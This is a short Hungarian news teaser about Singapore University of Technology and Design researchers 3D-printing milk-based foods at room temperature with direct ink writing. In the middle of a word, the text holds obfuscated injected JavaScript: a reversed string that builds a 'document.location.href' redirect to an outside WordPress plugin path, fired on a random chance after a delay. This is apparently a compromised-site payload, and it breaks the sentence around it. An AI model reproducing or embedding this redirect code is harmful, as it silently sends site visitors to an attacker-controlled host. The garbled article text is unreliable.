A szingapúri Műszaki és Tervezői Egyetem (SUTD) kutatói kifejlesztettek ki egy új módszert a tej alapú termékek közvetlen tintaírással (DIW) történő 3D nyomtatására szobahőmérsékleten, úgy, hogy a hőmérsékletre érzékeny tápanyagok nem sérülnek a folyamat során – írja a ScienceDaily. Az élelmiszerek 3D nyomtatását különböző nyomtatási módszerekkel érték el, beleértve a széles körben alkalmazott szelektív lézeres szinterelést (SLS), valamint a forró olvadék esetében használt extrudálási módszereket. Ezek a módszerek azonban nem mindig hatékonyak azokban az esetekben, amikor az adott ételtípusokban olyan tápanyag található, amely érzékeny a hőmérsékletváltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozásokra. Így például a tej gazdag kalciumban és fehérjében, azonban ezek a tápanyagok érzékenyen reagálnak a…
A cikk folytatódik: http://itmozaik.co.hu/tech/2020/09/21/kopogtat-a-jovo-ujszeru-modszer-tejtermekek-3d-nyomtatasara.html
- Hirdetés -